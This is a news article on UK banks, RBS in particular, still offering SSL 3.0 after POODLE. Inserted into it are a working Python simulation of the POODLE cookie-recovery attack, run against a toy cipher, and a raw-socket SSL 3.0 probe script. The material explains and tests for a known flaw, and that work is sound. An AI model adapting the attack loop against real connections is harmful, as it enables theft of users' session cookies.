UK banks ill-prepared for return of the rabid POODLE
Only 4,096 requests needed to uncover a 16-character cookie
Virgin laid bare
We began looking into this issue early last week, in response to a reader request, before the latest twist in the POODLE bug saga. El Reg reader Richard G came to us after getting nowhere with his complaints to his banks, having discovered that his RBS One Account (formerly the Virgin One Account) was still running SSL 3.0.
Sure enough, it turned out that RBS is sticking with SSL 3.0 for its online banking website, weeks after the discovery of the POODLE vulnerability, which made the already antiquated cryptographic protocol hopelessly unsafe.
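The subheading's figure of 4,096 requests for a 16-character cookie follows from how POODLE abuses SSL 3.0's CBC padding: the padding bytes are never checked, only the final length byte, so an attacker who can make the victim's browser send chosen-length requests swaps the record's all-padding last block for the block holding a cookie byte and watches whether the server accepts it. Acceptance happens with probability 1/256 per attempt and leaks one plaintext byte, so about 256 requests per byte, or 4,096 for 16 bytes. The simulation below is an added example, not code from the article or from any party it names; it uses a toy Feistel block cipher in place of AES/3DES, HMAC-SHA1 in place of the real SSL 3.0 MAC construction, and a constructed request layout, cookie and keys.

```python
import hashlib, hmac, random

BS = 16        # block size of the stand-in cipher (AES-sized)
MAC_LEN = 20   # SSL 3.0 record MAC length with SHA-1

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))
def _round(key, rnd, half):  # toy Feistel round function; stands in for AES/3DES
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BS // 2]

def block_encrypt(key, block):
    lh, rh = block[:BS // 2], block[BS // 2:]
    for rnd in range(4):
        lh, rh = rh, _xor(lh, _round(key, rnd, rh))
    return lh + rh

def block_decrypt(key, block):
    lh, rh = block[:BS // 2], block[BS // 2:]
    for rnd in reversed(range(4)):
        lh, rh = _xor(rh, _round(key, rnd, lh)), lh
    return lh + rh

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BS):
        prev = block_encrypt(key, _xor(pt[i:i + BS], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BS):
        out.append(_xor(block_decrypt(key, ct[i:i + BS]), prev))
        prev = ct[i:i + BS]
    return b"".join(out)

def ssl3_seal(key, mac_key, data, rng):
    """Client side: data || MAC || padding; padding bytes are arbitrary, last byte = pad length."""
    body = data + hmac.new(mac_key, data, hashlib.sha1).digest()
    pad_len = BS - 1 - len(body) % BS            # a whole block of padding when body is aligned
    padding = bytes(rng.getrandbits(8) for _ in range(pad_len)) + bytes([pad_len])
    iv = bytes(rng.getrandbits(8) for _ in range(BS))
    return iv, cbc_encrypt(key, iv, body + padding)

def ssl3_open(key, mac_key, iv, ct):
    """Server side: the SSL 3.0 flaw is that only the length byte is checked, never the padding."""
    pt = cbc_decrypt(key, iv, ct)
    if pt[-1] >= BS:                              # SSL 3.0 only requires pad length < block size
        return False
    body = pt[:len(pt) - pt[-1] - 1]
    if len(body) < MAC_LEN:
        return False
    return hmac.compare_digest(body[-MAC_LEN:], hmac.new(mac_key, body[:-MAC_LEN], hashlib.sha1).digest())

HEAD = b"POST /"                                               # constructed request shape: the
MID = b" HTTP/1.1\r\nHost: bank.example\r\nCookie: session="  # attacker's script picks path and
TAIL = b"\r\n\r\n"                                             # body lengths, the cookie is fixed

def make_victim(key, mac_key, secret, rng):
    def send(prefix_len, body_len):
        data = HEAD + b"a" * prefix_len + MID + secret + TAIL + b"x" * body_len
        return ssl3_seal(key, mac_key, data, rng)            # fresh IV each request
    return send

def layout(k, secret_len):
    """Lengths that put secret[k] last in block i and make the final block pure padding."""
    fixed = len(HEAD) + len(MID)
    prefix_len = (BS - 1 - (fixed + k)) % BS
    i = (fixed + prefix_len + k) // BS
    base = fixed + prefix_len + secret_len + len(TAIL) + MAC_LEN
    return prefix_len, (-base) % BS, i

def poodle_recover(secret_len, victim, oracle):
    """Returns (recovered secret, requests used); about 256 requests per byte on average."""
    recovered, requests = bytearray(), 0
    for k in range(secret_len):
        prefix_len, body_len, i = layout(k, secret_len)
        while True:
            iv, ct = victim(prefix_len, body_len)
            requests += 1
            forged = ct[:-BS] + ct[i * BS:(i + 1) * BS]        # padding block := target block
            if oracle(iv, forged):                              # accepted: D(C_i)[-1] ^ C_{n-2}[-1] == BS-1
                prev_i = iv if i == 0 else ct[(i - 1) * BS:i * BS]
                prev_last = ct[-2 * BS:-BS]
                recovered.append((BS - 1) ^ prev_i[-1] ^ prev_last[-1])   # P_i = D(C_i) ^ C_{i-1}
                break
    return bytes(recovered), requests

def demo(seed=1):
    rng = random.Random(seed)                                   # deterministic for the demo
    key = bytes(rng.getrandbits(8) for _ in range(16))
    mac_key = bytes(rng.getrandbits(8) for _ in range(20))
    secret = b"s3cr3t-c00kie-16"                                # constructed 16-byte cookie
    victim = make_victim(key, mac_key, secret, rng)
    return poodle_recover(len(secret), victim, lambda iv, ct: ssl3_open(key, mac_key, iv, ct))

if __name__ == "__main__":
    cookie, requests = demo()
    print("recovered %r in %d requests" % (cookie, requests))
```

Running `demo()` recovers the whole cookie; the request count varies with the random IVs but averages close to 4,096. The same swap against a TLS 1.0+ implementation that checks every padding byte fails with near certainty, which is why the protocol-level fix is simply to stop offering SSL 3.0, and why the TLS variant mentioned later only bites implementations that skipped that check.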
Browser makers have updated their software in the aftermath of POODLE. Richard G told us that the bank's reliance on the out-of-date protocol was causing him all sorts of problems. "My online banking no longer works with Firefox (support for SSL 3.0 dropped in FF 34)," Richard explained. "Or Chrome (dropped a while back). Or IE 11 when it is fully patched. Connections aren't allowed with Firefox or Chrome on Android either for the same reasons."
"The browsers have moved to drop SSL 3.0 and thereby cut the risk. That's very commendable. Unfortunately RBS hasn't sorted out its end," he added.
"I did contact RBS to outline the problem and ask if it was planning on moving to a protocol that wasn't actually compromised. The person I talked to didn't understand, and they suggested that it was the different browsers at fault," Richard explained.
Paul Moore, who helped us confirm that our reader had cause for concern about the security state of RBS's website, commented: "I wonder if it is scared of dropping all those customers on really old browsers."
However, obsolete browsers are currently in minimal use, so the "backward compatibility" justification is weak, according to Moore. "Although disabling SSL 3.0 should be mandatory, it's clearly not a priority," Moore concluded. "We should expect and demand better of our financial institutions."
The variant of POODLE that works against TLS affects flawed implementations of TLSv1, 1.1 and 1.2; since TLS underpins nearly all websites requiring in-transit encryption, the only workable option there is to patch the affected systems. "That doesn't negate the need to remove support for SSL 3.0, nor promote its use until a suitable patch has been applied," Moore added.
El Reg left voicemails for RBS's personal banking PR specialists last week but has yet to hear back with anything substantive.
The pre-login page now suggests using IE. "In other words, if your browser is rejecting the site for security reasons then use one that doesn't check. Brilliant. Presumably the number of helpline calls is increasing," Richard concluded. ®
For banks that support both TLSv1 and SSL 3.0 the system should work in the following way.
- Older browsers (IE6 on XP) can connect using SSL 3.0, which is now defunct and insecure.
- Modern browsers connect over TLSv1, falling back to SSL 3.0 as/when necessary.
- Bleeding-edge browsers (FF34, Chrome v39 et al) implement a minimum fallback level (currently TLSv1). If a session tries to fall back to SSL 3.0, it will refuse the connection on the grounds that SSL 3.0 is now insecure.
Thanks to Paul Moore for this additional piece of explanation.
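The quickest way to confirm a report like the reader's is to send a server a bare SSL 3.0 ClientHello and see whether it answers with a ServerHello (it still speaks SSL 3.0) or an alert or closed connection (it does not), then repeat with a TLS 1.0 hello to tell "SSL 3.0 only" apart from "SSL 3.0 also offered". The script below is an added example, not code from the article or from Paul Moore; the cipher-suite list and the use of port 443 are assumptions, and the sample server responses in the usage note are constructed. Modern TLS libraries refuse to speak SSL 3.0 at all, which is why the hello is built by hand over a plain socket.

```python
import os
import socket
import struct

SSL3 = (3, 0)
TLS10 = (3, 1)

# Suites an SSL 3.0 server is likely to accept (RSA key exchange; CBC or RC4). Assumed list.
SSL3_SUITES = (0x002F, 0x0035, 0x000A, 0x0005, 0x0004)

ALERTS = {0x28: "handshake_failure", 0x46: "protocol_version",
          0x0A: "unexpected_message", 0x2F: "insufficient_security"}

def build_client_hello(version, suites=SSL3_SUITES, client_random=None):
    """Record-layer ClientHello for the given version; SSL 3.0 has no extensions, so none are sent."""
    client_random = client_random or os.urandom(32)
    body = bytes(version) + client_random + b"\x00"                 # version, random, empty session id
    body += struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00"                                              # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body       # handshake type 1 = ClientHello
    return b"\x16" + bytes(version) + struct.pack("!H", len(handshake)) + handshake

def classify_response(data):
    """Interpret the first record the server sends back."""
    if len(data) < 5:
        return ("closed", None)
    ctype = data[0]
    if ctype == 0x16 and len(data) >= 11 and data[5] == 0x02:       # handshake record, ServerHello
        return ("accepted", (data[9], data[10]))                    # negotiated version
    if ctype == 0x15 and len(data) >= 7:                            # alert record
        return ("refused", ALERTS.get(data[6], "alert_%d" % data[6]))
    return ("unexpected", ctype)

def probe(host, port, version, timeout=5.0):
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_client_hello(version))
        try:
            data = s.recv(4096)
        except (socket.timeout, ConnectionResetError):
            data = b""
    return classify_response(data)

if __name__ == "__main__":
    import sys
    for name, ver in (("SSL 3.0", SSL3), ("TLS 1.0", TLS10)):
        print(name, probe(sys.argv[1], 443, ver))
```

Run as `python3 probe.py bank.example`: a server that still accepts SSL 3.0 returns `('accepted', (3, 0))` for the first probe, one that has disabled it returns `('refused', 'handshake_failure')`, `('refused', 'protocol_version')` or `('closed', None)`. Two caveats: the hello carries no SNI (SSL 3.0 has no extensions), so on a shared IP you are testing whatever default site answers, and a positive result only shows the version is offered, not which suites are negotiable or whether the server honours TLS_FALLBACK_SCSV; tools such as `openssl s_client -ssl3` (on a build that still has SSL 3.0) or a full scanner give the rest.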